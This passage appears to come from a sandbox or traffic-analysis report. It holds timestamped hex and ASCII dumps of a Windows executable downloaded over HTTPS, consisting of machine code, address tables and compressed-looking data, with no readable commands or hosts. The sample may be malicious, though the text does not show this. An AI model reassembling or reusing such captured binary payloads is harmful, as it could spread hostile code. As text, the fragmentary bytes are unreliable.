                                                                                                                                  2022-10-17 20:06:34 UTC47INData Raw: 00 00 83 b8 94 00 00 00 00 74 05 e8 b2 d5 ff ff 83 65 fc 00 e8 96 d5 ff ff 83 4d fc ff e8 54 d5 ff ff e8 24 13 00 00 8b 4d 08 6a 00 6a 00 89 88 94 00 00 00 e8 a9 d0 ff ff cc 6a 2c 68 88 ef 41 00 e8 11 23 00 00 8b d9 8b 7d 0c 8b 75 08 89 5d e4 83 65 cc 00 8b 47 fc 89 45 dc ff 76 18 8d 45 c4 50 e8 d4 ce ff ff 59 59 89 45 d8 e8 da 12 00 00 8b 80 88 00 00 00 89 45 d4 e8 cc 12 00 00 8b 80 8c 00 00 00 89 45 d0 e8 be 12 00 00 89 b0 88 00 00 00 e8 b3 12 00 00 8b 4d 10 89 88 8c 00 00 00 83 65 fc 00 33 c0 40 89 45 10 89 45 fc ff 75 1c ff 75 18 53 ff 75 14 57 e8 22 cf ff ff 83 c4 14 89 45 e4 83 65 fc 00 eb 6f 8b 45 ec e8 ce fd ff ff c3 8b 65 e8 e8 70 12 00 00 83 a0 0c 02 00 00 00 8b 75 14 8b 7d 0c 81 7e 04 80 00 00 00 7f 06 0f be 4f 08 eb 03 8b 4f 08 8b 5e 10 83 65
                                                                                                                                  Data Ascii: teMT$Mjjj,hA#}u]eGEvEPYYEEEMe3@EEuuSuW"EeoEepu}~OO^e
                                                                                                                                  2022-10-17 20:06:34 UTC55INData Raw: 4e 01 89 4b fc 8d 5c 33 fc 8b 75 10 c1 fe 04 4e 89 5d 0c 89 4b fc 83 fe 3f 76 03 6a 3f 5e f6 45 fc 01 0f 85 80 00 00 00 8b 75 fc c1 fe 04 4e 83 fe 3f 76 03 6a 3f 5e 8b 4f 04 3b 4f 08 75 42 bb 00 00 00 80 83 fe 20 73 19 8b ce d3 eb 8d 74 06 04 f7 d3 21 5c 90 44 fe 0e 75 23 8b 4d 08 21 19 eb 1c 8d 4e e0 d3 eb 8d 4c 06 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 4f 08 8b 77 04 89 71 04 8b 77 08 8b 4f 04 89 71 08 8b 75 10 03 75 fc 89 75 10 c1 fe 04 4e 83 fe 3f 76 03 6a 3f 5e 8b 4d f4 8d 0c f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0
                                                                                                                                  Data Ascii: NK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL!uM!Y]OwqwOquuuN?vj?^MyK{YKYK;KuWLML s}uM9DD }uN
                                                                                                                                  2022-10-17 20:06:34 UTC62INData Raw: 08 50 e8 31 a1 ff ff 85 c0 0f be 45 08 59 75 06 83 e0 df 83 e8 07 5d c3 ff 4a 04 78 09 8b 0a 0f b6 01 41 89 0a c3 52 e8 9c 80 00 00 59 c3 8b ff 55 8b ec 83 7d 08 ff 74 06 5d e9 b4 81 00 00 5d c3 8b ff 55 8b ec 53 8b 55 08 ff 06 e8 c7 ff ff ff 8b d8 83 fb ff 74 0e 0f b6 c3 50 e8 dc a1 ff ff 59 85 c0 75 e1 8b c3 5b 5d c3 8b ff 55 8b ec 81 ec fc 01 00 00 a1 48 17 43 00 33 c5 89 45 fc 8b 4d 14 8b 45 08 56 33 f6 57 8b 7d 0c 89 8d 1c fe ff ff 8d 8d 7c fe ff ff 89 85 64 fe ff ff 89 8d 54 fe ff ff c7 85 24 fe ff ff 5e 01 00 00 89 b5 30 fe ff ff 89 b5 18 fe ff ff 89 b5 78 fe ff ff 3b fe 75 20 e8 6d aa ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 a4 93 ff ff 83 c4 14 83 c8 ff e9 35 0f 00 00 3b c6 74 dc f6 40 0c 40 53 75 7a 50 e8 00 67 00 00 59 ba 10 1d 43 00 83 f8 ff
                                                                                                                                  Data Ascii: P1EYu]JxARYU}t]]USUtPYu[]UHC3EMEV3W}|dT$^0x;u mVVVVV5;t@@SuzPgYC
                                                                                                                                  2022-10-17 20:06:34 UTC70INData Raw: 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 c9 c5 ff ff c3 83 3d 90 e3 58 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 90 e3 58 00 01 00 00 00 33 c0 c3 8b ff 55 8b ec 83 ec 0c a1 48 17 43 00 33 c5 89 45 fc 6a 06 8d 45 f4 50 68 04 10 00 00 ff 75 08 c6 45 fa 00 ff 15 d0 11 40 00 85 c0 75 05 83 c8 ff eb 0a 8d 45 f4 50 e8 2e 65 00 00 59 8b 4d fc 33 cd e8 91 8d ff ff c9 c3 8b ff 55 8b ec 83 ec 34 a1 48 17 43 00 33 c5 89 45 fc 8b 45 10 8b 4d 18 89 45 d8 8b 45 14 53 89 45 d0 8b 00 56 89 45 dc 8b 45 08 57 33 ff 89 4d cc 89 7d e0 89 7d d4 3b 45 0c 0f 84 5f 01 00 00 8b 35 68 11 40 00 8d 4d e8 51 50 ff d6 8b 1d 24 11 40 00 85 c0 74 5e 83 7d e8 01 75 58 8d 45 e8 50 ff 75 0c ff d6 85 c0 74 4b 83 7d e8 01 75 45 8b 75 dc c7 45 d4 01 00 00 00 83 fe ff 75 0c ff 75 d8 e8 7d
                                                                                                                                  Data Ascii: eE=XujVYX3UHC3EjEPhuE@uEP.eYM3U4HC3EEMEESEVEEW3M}};E_5h@MQP$@t^}uXEPutK}uEuEuu}
                                                                                                                                  2022-10-17 20:06:34 UTC78INData Raw: 03 f7 d8 1b c0 40 89 46 10 e8 31 6e ff ff 83 e8 03 f7 d8 1b c0 83 66 18 00 40 83 7e 10 00 59 59 89 46 14 74 05 6a 02 58 eb 07 8b 16 e8 09 fc ff ff 6a 01 68 c2 41 41 00 89 46 0c ff 15 e0 11 40 00 8b 46 08 a9 00 01 00 00 74 0b a9 00 02 00 00 74 04 a8 07 75 04 83 66 08 00 c3 ff 36 e8 dd 6d ff ff 83 e8 03 f7 d8 1b c0 40 59 89 46 10 74 05 6a 02 58 eb 07 8b 16 e8 be fb ff ff 6a 01 68 94 43 41 00 89 46 0c ff 15 e0 11 40 00 f6 46 08 04 75 04 83 66 08 00 c3 8b ff 55 8b ec 53 56 57 e8 a7 95 ff ff 8b 5d 08 8b f0 81 c6 9c 00 00 00 85 db 75 0c 81 4e 08 04 01 00 00 e9 bd 00 00 00 8d 43 40 8d 7e 04 89 1e 89 07 85 c0 74 15 80 38 00 74 10 57 6a 16 68 f8 2f 40 00 e8 fd f9 ff ff 83 c4 0c 8b 06 83 66 08 00 85 c0 74 53 80 38 00 74 4e 8b 07 85 c0 74 0c 80 38 00 74 07 e8 f3 fe
                                                                                                                                  Data Ascii: @F1nf@~YYFtjXjhAAF@Fttuf6m@YFtjXjhCAF@FufUSVW]uNC@~t8tWjh/@ftS8tNt8t
                                                                                                                                  2022-10-17 20:06:34 UTC86INData Raw: 75 11 e8 70 4d ff ff c7 00 09 00 00 00 8b c7 8b d7 eb 4a ff 75 14 8d 4d fc 51 ff 75 f8 50 ff 15 ec 11 40 00 89 45 f8 3b c7 75 13 ff 15 3c 11 40 00 85 c0 74 09 50 e8 62 4d ff ff 59 eb cf 8b c6 c1 f8 05 8b 04 85 60 d2 58 00 83 e6 1f c1 e6 06 8d 44 30 04 80 20 fd 8b 45 f8 8b 55 fc 5f 5e c9 c3 6a 14 68 38 f2 41 00 e8 aa 86 ff ff 83 ce ff 89 75 dc 89 75 e0 8b 45 08 83 f8 fe 75 1c e8 07 4d ff ff 83 20 00 e8 ec 4c ff ff c7 00 09 00 00 00 8b c6 8b d6 e9 d0 00 00 00 33 ff 3b c7 7c 08 3b 05 48 d2 58 00 72 21 e8 dd 4c ff ff 89 38 e8 c3 4c ff ff c7 00 09 00 00 00 57 57 57 57 57 e8 fa 35 ff ff 83 c4 14 eb c8 8b c8 c1 f9 05 8d 1c 8d 60 d2 58 00 8b f0 83 e6 1f c1 e6 06 8b 0b 0f be 4c 31 04 83 e1 01 75 26 e8 9c 4c ff ff 89 38 e8 82 4c ff ff c7 00 09 00 00 00 57 57 57 57
                                                                                                                                  Data Ascii: upMJuMQuP@E;u<@tPbMY`XD0 EU_^jh8AuuEuM L3;|;HXr!L8LWWWWW5`XL1u&L8LWWWW
                                                                                                                                  2022-10-17 20:06:34 UTC94INData Raw: 85 8e 00 00 00 68 b8 38 40 00 ff 15 00 10 40 00 8b f8 85 ff 0f 84 2a 01 00 00 8b 35 68 10 40 00 68 ac 38 40 00 57 ff d6 85 c0 0f 84 14 01 00 00 50 e8 ce 54 ff ff c7 04 24 9c 38 40 00 57 a3 6c d1 58 00 ff d6 50 e8 b9 54 ff ff c7 04 24 88 38 40 00 57 a3 70 d1 58 00 ff d6 50 e8 a4 54 ff ff c7 04 24 6c 38 40 00 57 a3 74 d1 58 00 ff d6 50 e8 8f 54 ff ff 59 a3 7c d1 58 00 85 c0 74 14 68 54 38 40 00 57 ff d6 50 e8 77 54 ff ff 59 a3 78 d1 58 00 a1 78 d1 58 00 3b c3 74 4f 39 1d 7c d1 58 00 74 47 50 e8 d5 54 ff ff ff 35 7c d1 58 00 8b f0 e8 c8 54 ff ff 59 59 8b f8 85 f6 74 2c 85 ff 74 28 ff d6 85 c0 74 19 8d 4d f8 51 6a 0c 8d 4d ec 51 6a 01 50 ff d7 85 c0 74 06 f6 45 f4 01 75 09 81 4d 10 00 00 20 00 eb 39 a1 70 d1 58 00 3b c3 74 30 50 e8 85 54 ff ff 59 85 c0 74 25
                                                                                                                                  Data Ascii: h8@@*5h@h8@WPT$8@WlXPT$8@WpXPT$l8@WtXPTY|XthT8@WPwTYxXxX;tO9|XtGPT5|XTYYt,t(tMQjMQjPtEuM 9pX;t0PTYt%
                                                                                                                                  2022-10-17 20:06:34 UTC101INData Raw: ac 83 e9 60 39 55 14 75 06 33 c0 66 89 45 c4 39 55 ac 0f 84 c6 02 00 00 eb 05 8b 4d 84 33 d2 8b 45 ac c1 7d ac 03 83 c1 54 83 e0 07 89 4d 84 3b c2 0f 84 9d 02 00 00 6b c0 0c 03 c1 8b d8 b8 00 80 00 00 66 39 03 72 0e 8b f3 8d 7d b8 a5 a5 a5 ff 4d ba 8d 5d b8 0f b7 4b 0a 33 c0 89 45 b0 89 45 d4 89 45 d8 89 45 dc 8b 45 ce 8b f1 ba ff 7f 00 00 33 f0 23 c2 23 ca 81 e6 00 80 00 00 bf ff 7f 00 00 8d 14 01 89 75 90 0f b7 d2 66 3b c7 0f 83 21 02 00 00 66 3b cf 0f 83 18 02 00 00 bf fd bf 00 00 66 3b d7 0f 87 0a 02 00 00 be bf 3f 00 00 66 3b d6 77 0d 33 c0 89 45 c8 89 45 c4 e9 0e 02 00 00 33 f6 66 3b c6 75 1f 42 f7 45 cc ff ff ff 7f 75 15 39 75 c8 75 10 39 75 c4 75 0b 33 c0 66 89 45 ce e9 eb 01 00 00 66 3b ce 75 21 42 f7 43 08 ff ff ff 7f 75 17 39 73 04 75 12 39 33
                                                                                                                                  Data Ascii: `9Uu3fE9UM3E}TM;kf9r}M]K3EEEEE3##uf;!f;f;?f;w3EE3f;uBEu9uu9uu3fEf;u!BCu9su93
                                                                                                                                  2022-10-17 20:06:34 UTC109INData Raw: 1c e7 41 00 e9 de d2 fe ff 8b 4d f0 e9 94 94 fe ff b8 48 e7 41 00 e9 cc d2 fe ff 8b 4d f0 e9 9f c7 fe ff 8b 4d f0 83 c1 04 e9 a5 a7 fe ff 8b 4d f0 83 c1 20 e9 9a a7 fe ff 8b 4d f0 83 c1 3c e9 8f a7 fe ff 8b 4d f0 83 c1 58 e9 84 a7 fe ff b8 6c e7 41 00 e9 8e d2 fe ff 8b 4d f0 e9 da cf fe ff b8 c0 e7 41 00 e9 7c d2 fe ff ff 75 08 e8 ca d0 fe ff 59 c3 8b 45 f0 83 e0 01 0f 84 0c 00 00 00 83 65 f0 fe 8d 4d d4 e9 46 a7 fe ff c3 b8 fc e7 41 00 e9 4f d2 fe ff 8d 4d d8 e9 33 a7 fe ff b8 38 e8 41 00 e9 3d d2 fe ff 8d 4d ec e9 10 c7 fe ff b8 bc e8 41 00 e9 2b d2 fe ff ff 75 ec e8 79 d0 fe ff 59 c3 8b 45 f0 83 e0 01 0f 84 0c 00 00 00 83 65 f0 fe 8d 4d d0 e9 f5 a6 fe ff c3 8b 45 f0 83 e0 02 0f 84 0f 00 00 00 83 65 f0 fd 8d 8d 5c ff ff ff e9 60 aa fe ff c3 b8 08 e9 41
                                                                                                                                  Data Ascii: AMHAMMM M<MXlAMA|uYEeMFAOM38A=MA+uyYEeMEe\`A
                                                                                                                                  2022-10-17 20:06:34 UTC117INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-10-17 20:06:34 UTC125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 12 40 00 76 ca 92 68 da dc 41 00 4b 48 26 14 0f 0c 61 76 53 10 23 8d 35 49 d8 b6 72 0d 29 5f f1 e4 6d 56 e6 83 62 15 9d ae 89 64 0a 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: @vhAKH&avS#5Ir)_mVbdS
                                                                                                                                  2022-10-17 20:06:34 UTC133INData Raw: 64 af 1e bf 84 0e 03 ea b9 b3 0d 45 4f 1c 28 ce 90 c4 a3 65 82 e1 aa 27 04 14 83 c1 1e af da 7a 7e 1b 4e 2c 5d bb d1 df 94 ac 11 40 ce 24 39 3d b9 e7 04 63 d1 5c 21 4f b2 e4 d8 98 8b 22 cc a8 81 fa f5 bb 6e 0d 4a 37 7b e7 e1 b8 f8 a3 a1 ef 9c 2f 11 f8 70 59 b2 ed b1 f8 e3 a0 e9 9c f2 6f 9c 5d 75 f8 2f a5 93 a9 8b 9d cb f6 c3 cc 54 e5 6e e4 e5 6f 5a c3 2a 1f 15 70 0f 1a 21 be a5 35 f4 0f 7e 6e 62 21 3f 54 8a 66 11 be 51 4a ef 9e 65 a2 e8 b5 bc 61 de cd 87 7d 77 4f a9 19 87 88 e8 12 2b 31 70 3a 02 6c ac db 4d 2b 6a 75 ff db c2 e8 a6 c6 81 fd 1d 1f 0c 97 ae 2a c7 f7 35 fe b2 b3 09 15 4a 31 26 b7 6e 2e 16 d0 08 5d ce 21 78 8d 63 ae c4 7c 58 81 35 78 15 4b 38 58 2d 9d 37 71 20 73 ad 9a c8 1c 68 d1 fa 4d 7b 72 7b d9 a4 c8 cb 00 06 93 b1 3e 01 41 c7 07 fa 5c bc
                                                                                                                                  Data Ascii: dEO(e'z~N,]@$9=c\!O"nJ7{/pYo]u/TnoZ*p!5~nb!?TfQJea}wO+1p:lM+ju*5J1&n.]!xc|X5xK8X-7q shM{r{>A\
                                                                                                                                  2022-10-17 20:06:34 UTC140INData Raw: 52 31 3a 2c 90 74 c4 c5 c3 aa ee 7d 92 64 e2 e1 1c a6 e1 85 45 ea 34 e2 93 9e 5e fa cf 17 8b b2 56 ce 70 5f 41 f8 b4 5f 5e 28 61 bc 75 5c ea 6b 39 0d 31 fb 66 81 0e ba 9c 44 cb 90 ae 49 f3 c7 d3 b2 3f 61 51 b7 12 ba 16 91 e2 6c 20 8c 2f fb f8 10 48 32 d3 8a 22 26 2b b4 2a 4b a2 0a 21 aa b1 87 c2 df ed d2 50 f1 23 52 a8 91 76 11 91 3f 9a f0 3a 2d 23 fc d7 56 84 2d 05 d3 88 76 a2 fb 37 3b fd ec ae e4 a2 59 c6 99 4e 4e 05 30 be 9e 0e 29 d4 f2 a6 e9 9e d5 fb e8 7a 61 17 c3 f8 a5 4b bb ed a4 98 79 58 c2 9d df 8a 17 9f ad ee ed f0 c5 d5 b6 f8 2e ce 6f 0e e4 22 e0 f9 84 69 7c bf 5e e6 21 af 49 9c d6 6b 1e bd 51 65 31 c4 87 b7 2a 7e 36 48 10 df 73 6c 08 e9 65 91 10 c0 a5 ba cd 9c e2 29 c3 18 7e e9 1a 48 37 f4 fc e8 4c 39 30 ad 3e 80 66 09 66 04 8e c2 c5 f9 d1 bf
                                                                                                                                  Data Ascii: R1:,t}dE4^Vp_A_^(au\k91fDI?aQl /H2"&+*K!P#Rv?:-#V-v7;YNN0)zaKyX.o"i|^!IkQe1*~6Hsle)~H7L90>ff
                                                                                                                                  2022-10-17 20:06:34 UTC148INData Raw: 66 5c eb a9 71 5f 46 e0 0d 4e 44 28 f0 84 81 b1 7d 57 8c 38 c5 d2 46 49 2a 94 df 07 e6 8c 8a df c3 a3 66 70 68 65 e7 fa 14 b7 22 44 e1 ba 38 12 52 8f d5 17 17 c0 6b 70 34 0a f1 ac 7d b2 a6 c2 88 a8 8e 93 90 79 3e 52 a3 a0 16 3c 07 d6 ee dc 5d a1 f3 5e 2a 2d 87 b9 47 67 6d f3 ca c8 87 10 af 7c 0d 86 73 64 c5 6d 67 1a 3c 47 b5 d2 25 57 ca 8a 0a d8 b2 4e fd 63 ab 46 35 ab d9 19 82 62 a9 6a d6 0c 77 e9 40 65 27 51 a8 49 8c b2 aa 94 dc 9e 86 20 65 8a a6 8d 64 d6 84 bb 97 ae d8 c7 05 93 5e e1 7a 59 22 b9 26 cf f3 0d 5b a7 c1 0a 7d de 0c 8d 3a 88 fd ec 5c 2d c2 5e 4e 69 27 63 75 c6 18 22 09 45 0f c3 8a 2b 56 16 42 bc 88 aa 79 ab 32 ec f5 b4 bd 39 29 f3 32 8e 33 a6 03 0c 66 a7 23 3f 83 89 96 c9 fb 02 8a c4 0d b3 7c f2 36 16 04 51 29 a9 93 96 5e 8a 34 eb 7f 8c f0
                                                                                                                                  Data Ascii: f\q_FND(}W8FI*fphe"D8Rkp4}y>R<]^*-Ggm|sdmg<G%WNcF5bjw@e'QI ed^zY"&[}:\-^Ni'cu"E+VBy29)23f#?|6Q)^4
                                                                                                                                  2022-10-17 20:06:34 UTC156INData Raw: 1f 12 b5 1e 2d 36 f1 05 f3 8c cf 47 c0 42 8e 2c 02 61 e7 be a5 4a 8a 7a 69 11 8c ae 4a 1c 18 50 4c 56 d2 70 6f 0b 2a bb e0 89 ee 14 53 d6 f7 04 e3 9d 5f 93 94 1c 1d 5c 2c 65 4c 21 a1 84 09 b6 ff f4 ad 1d be 46 2a 4c 83 48 da e5 fc 17 cc e6 c8 39 1e ec 96 21 6a 77 54 17 9f 6f 05 94 13 19 95 3d 19 72 cb 3f bf ff ef ec ed 84 8c cc 50 be ed c1 4b 65 df 75 75 4f fe f7 06 2a c4 95 9e 85 39 99 70 9f 51 b1 68 90 ad e8 99 4e 37 07 40 9f e8 e8 c7 a6 f8 d2 31 36 3a ca 6b 15 b3 65 1b 53 86 7a 72 97 f3 bf a1 f7 d1 c8 f1 09 85 1e 2f d0 de 03 22 82 93 28 71 ff c5 96 37 5f 39 ac 92 09 5f ed 1d 69 cf 2e 43 26 8e 56 58 da 5c e3 8b 83 0d 92 0f 57 53 c3 b2 df 01 78 fb 3c 99 65 9e 27 c7 c9 19 db f6 fe d3 dc 0d 97 d4 79 2c c9 81 2b 1c 0f e2 42 de 9a 05 0b 65 48 6d 56 69 ee c3
                                                                                                                                  Data Ascii: -6GB,aJziJPLVpo*S_\,eL!F*LH9!jwTo=r?PKeuuO*9pQhN7@16:keSzr/"(q7_9_i.C&VX\WSx<e'y,+BeHmVi
                                                                                                                                  2022-10-17 20:06:34 UTC164INData Raw: fd e4 16 f1 c2 74 11 dd 59 bd 91 19 40 98 b3 70 15 de 2f 42 15 82 05 e7 ff ab 52 46 3e 23 1c 1c 48 ba a7 62 79 b9 c4 16 75 e5 55 c9 c5 55 af 8a 5b 7a 5b f2 61 b2 f5 57 11 56 2c 85 c1 58 85 36 4f 5d 0c 7c 25 65 c3 21 76 42 fd fe 6e c7 fd 07 43 60 76 16 39 33 65 8c 22 e5 a6 26 e9 c4 10 63 02 f3 26 29 b0 c5 06 2c 0a 50 2f 3a 59 b9 4f ba b9 a2 aa 97 ad 9d cc 33 25 78 52 33 4d 39 6e 67 51 26 1e f3 2f e5 b8 8a 92 58 0e 9b 47 87 4e b3 16 89 a6 36 f2 93 ab 81 81 d6 83 88 df 39 27 db 6a 23 7f 4b e2 18 dd fb 10 f0 8d 83 8b c7 72 db dd 51 6e 26 62 7c c1 c4 bd eb 2c 59 81 ef 08 a1 b9 81 e5 41 d5 68 5c 72 d1 b1 0b 93 a2 23 cf a3 b7 42 7c a4 35 4b 29 30 ce 40 59 ca de e4 4a 45 38 07 e9 96 86 74 af eb 44 ac 9a 37 eb 6c e4 7f 4c f6 57 77 7e ec 6f 1d 1f d9 42 20 98 57 7b
                                                                                                                                  Data Ascii: tY@p/BRF>#HbyuUU[z[aWV,X6O]|%e!vBnC`v93e"&c&),P/:YO3%xR3M9ngQ&/XGN69'j#KrQn&b|,YAh\r#B|5K)0@YJE8tD7lLWw~oB W{
                                                                                                                                  2022-10-17 20:06:34 UTC172INData Raw: a2 69 b1 bb 54 d9 e7 15 85 2e ff ac b4 f0 e8 0b 6c f8 72 9a 37 64 22 bf 9a b3 1a 9e 49 a1 c5 4d 82 ab 71 fe c4 72 16 61 0c 38 7f 69 06 4b 9d 7c a2 7f b1 49 80 b9 d9 f5 0f 60 a7 12 48 60 ad 7b d8 e4 81 1f 43 ec 99 43 08 b9 40 bf 57 1f ba ab 58 6a af d0 ca 75 a0 35 5a a2 61 23 8e b3 26 d2 7e b1 8a 84 a4 d6 ad e3 d9 42 55 2f 09 59 3a 2e 5f 93 1f b8 a3 6f 5c 65 03 74 a9 43 ef 1e c8 6b 4e a5 ca 8e 1e 42 ed 48 a5 86 83 63 e4 15 a0 37 df 16 44 7d 05 eb 9c 8f 82 58 3b d6 5f 12 c3 42 7a 08 c7 b3 99 d7 fa fb 7b 6e f3 91 89 08 0f 99 46 ee 45 b1 8c 72 3d dc 79 ca c8 51 8b 53 e0 bf 47 59 bd 32 66 70 e3 45 62 5f c4 b8 a5 09 f4 58 22 23 90 19 b3 f1 6e e1 16 06 78 4a f5 eb d8 f5 26 f1 a3 65 7f 31 45 b4 de c6 23 92 3d 2c 88 af 37 39 63 08 85 71 d6 fe f7 0f 24 73 d1 6f e2
                                                                                                                                  Data Ascii: iT.lr7d"IMqra8iK|I`H`{CC@WXju5Za#&~BU/Y:._o\etCkNBHc7D}X;_Bz{nFEr=yQSGY2fpEb_X"#nxJ&e1E#=,79cq$so
                                                                                                                                  2022-10-17 20:06:34 UTC180INData Raw: ab 25 4b fc 7f fd f9 c0 5f 87 5c a9 9f 4f 9b 08 30 1a f4 2a b2 4f 3d ca 5a 94 ec 5c f7 13 af 3f b9 88 ba 94 07 a4 c5 7b 62 74 8b e8 23 cd 44 74 99 ec ca 52 25 d2 bd df 54 f4 47 23 97 60 bd 9b 56 7e f3 22 0c 8d d5 82 ec f4 fa 2b 7e 00 33 0a 45 7d 48 35 dc e9 47 b4 89 3b d0 ff 99 e8 31 3d 85 a9 41 78 73 ff 3b d3 2f 42 e0 04 96 28 15 0b 52 48 6d 9e 43 04 f4 47 92 6e 93 26 71 b0 43 36 e9 38 22 4a 5f ea ec 8b ad f3 77 11 09 4f 5b e2 7e 53 fd ec 7b c3 2f fa 6f 7b 24 85 73 a0 42 9a 2c 3d 97 9e 31 76 d9 73 08 7f f4 e7 42 f4 3f 83 2b 86 9f ba 17 20 4d 29 36 06 f5 00 4a c6 8f eb c1 37 c9 37 0a 34 cf 8d 84 04 c7 b4 8d b1 6b b4 b2 2c 39 f7 8f 2c cd 9d d4 d6 c6 99 9b 88 a3 ac 3b 45 bc 07 fd 56 db f7 cf 39 c6 ba 06 8e dc 5b a3 f4 2a 22 9a 53 56 36 d3 8b 3d a6 64 fa 2c
                                                                                                                                  Data Ascii: %K_\O0*O=Z\?{bt#DtR%TG#`V~"+~3E}H5G;1=Axs;/B(RHmCGn&qC68"J_wO[~S{/o{$sB,=1vsB?+ M)6J774k,9,;EV9[*"SV6=d,
                                                                                                                                  2022-10-17 20:06:34 UTC187INData Raw: 06 55 6c c4 79 e5 d3 fa 71 e9 af eb c8 6d 2d 09 54 72 96 59 07 89 31 a9 ff c3 7d 5b 56 73 db 3c d4 d4 7b 23 1b 70 a7 1b f0 7f d7 a0 c7 7a 8e 4a 69 dc 43 20 79 06 1f 67 9c f5 b4 4e 26 ec 80 ff 37 a2 a0 9f e3 05 85 f2 23 91 ab 27 55 f9 f7 5c c4 a3 53 dc 2f 1f c8 81 58 78 63 8a e0 f0 92 0c 68 b9 cb d8 9f 3a 4d 83 06 0d 62 8d 8c f5 da df 62 ea 3a a6 1d 0c e6 08 39 09 ff 6d 9e 8c 38 ef 84 89 eb 90 a1 32 ee 0f 7a 8e 55 42 10 67 45 2e 48 e3 96 ae e9 ef 71 0b f8 2f 44 50 81 30 3f 39 4f c9 49 0c 90 98 41 11 90 a3 6a 0a 1e 9a 48 6f 6b e8 c8 95 e6 b8 a1 41 4a 85 4c 0e 3b 8a 62 9f 70 e0 03 70 fa d0 a8 a8 55 95 69 66 9f b3 52 97 fe de 5a c3 b3 8b 7b 12 20 b6 a5 41 d6 01 19 7a db 9d 1e ba d6 ba 52 1d 12 ea bd bb ff 23 3a 8e c1 96 7a 3e be 2a a0 55 1f c1 d6 45 54 a0 dc
                                                                                                                                  Data Ascii: Ulyqm-TrY1}[Vs<{#pzJiC ygN&7#'U\S/Xxch:Mbb:9m82zUBgE.Hq/DP0?9OIAjHokAJL;bppUifRZ{ AzR#:z>*UET
                                                                                                                                  2022-10-17 20:06:34 UTC195INData Raw: 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 15 43 00 00 00 00 00 00 00 00 00 e0 17 40 00 68 1c 40 00 e8 1d 40 00 70 22 43 00 a8 18 43 00 01 00 00 00 a8 18 43 00 50 1d 43 00 a0 20 40 00 90 20 40 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 55 ff 40 00 00 00 00 00 02 00 00 00 a0 26 40 00 08 00 00 00 74 26 40 00 09 00 00 00 48 26 40 00 0a 00 00 00 b0 25 40 00 10 00 00 00 84 25 40 00 11 00 00 00 54 25 40 00 12 00 00 00 30 25 40 00 13 00 00 00 04 25 40 00 18 00 00 00 cc 24 40 00 19 00 00 00 a4 24 40 00 1a 00 00 00 6c 24 40 00
                                                                                                                                  Data Ascii: CCCTC@h@@p"CCCPC @ @?A?A?A?A?A?A?A?A?A?AU@&@t&@H&@%@%@T%@0%@%@$@$@l$@
                                                                                                                                  2022-10-17 20:06:34 UTC203INData Raw: d8 be ce c4 c3 ca d6 bc d1 c2 d9 c0 ce ca d8 be c2 bf d4 c3 db bd dc b8 c9 c1 ce c0 d3 c9 da c2 bb bb c1 b8 d7 c3 e2 b8 d2 bf ce bf cd c2 d7 c0 be cc d7 c5 d2 ca d8 c2 cc c5 db c0 cc ca d8 c6 d2 d7 cf be d2 ce d2 c8 cd d1 cf c5 d0 cc db 8c 9a 95 c4 80 7b 83 d3 95 d2 c9 3d 94 c6 cf 37 95 d1 d5 37 a3 b7 cf 3d 9a b9 d0 43 99 bc d0 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 80 80 ce 95 93 8e c9 bf cc c5 da ca d3 cb ce c0 cd b8 ce c3 cd c0 d2 c5 d3 bd d9 c8 d9 b9 d5 c6 c4 a8 d6 c8 cf c0 d1 d1 db c9 d0 c5 d3 c4 ce bb ca b6 d3 ba c4 b2 cb be d7 b5 d8 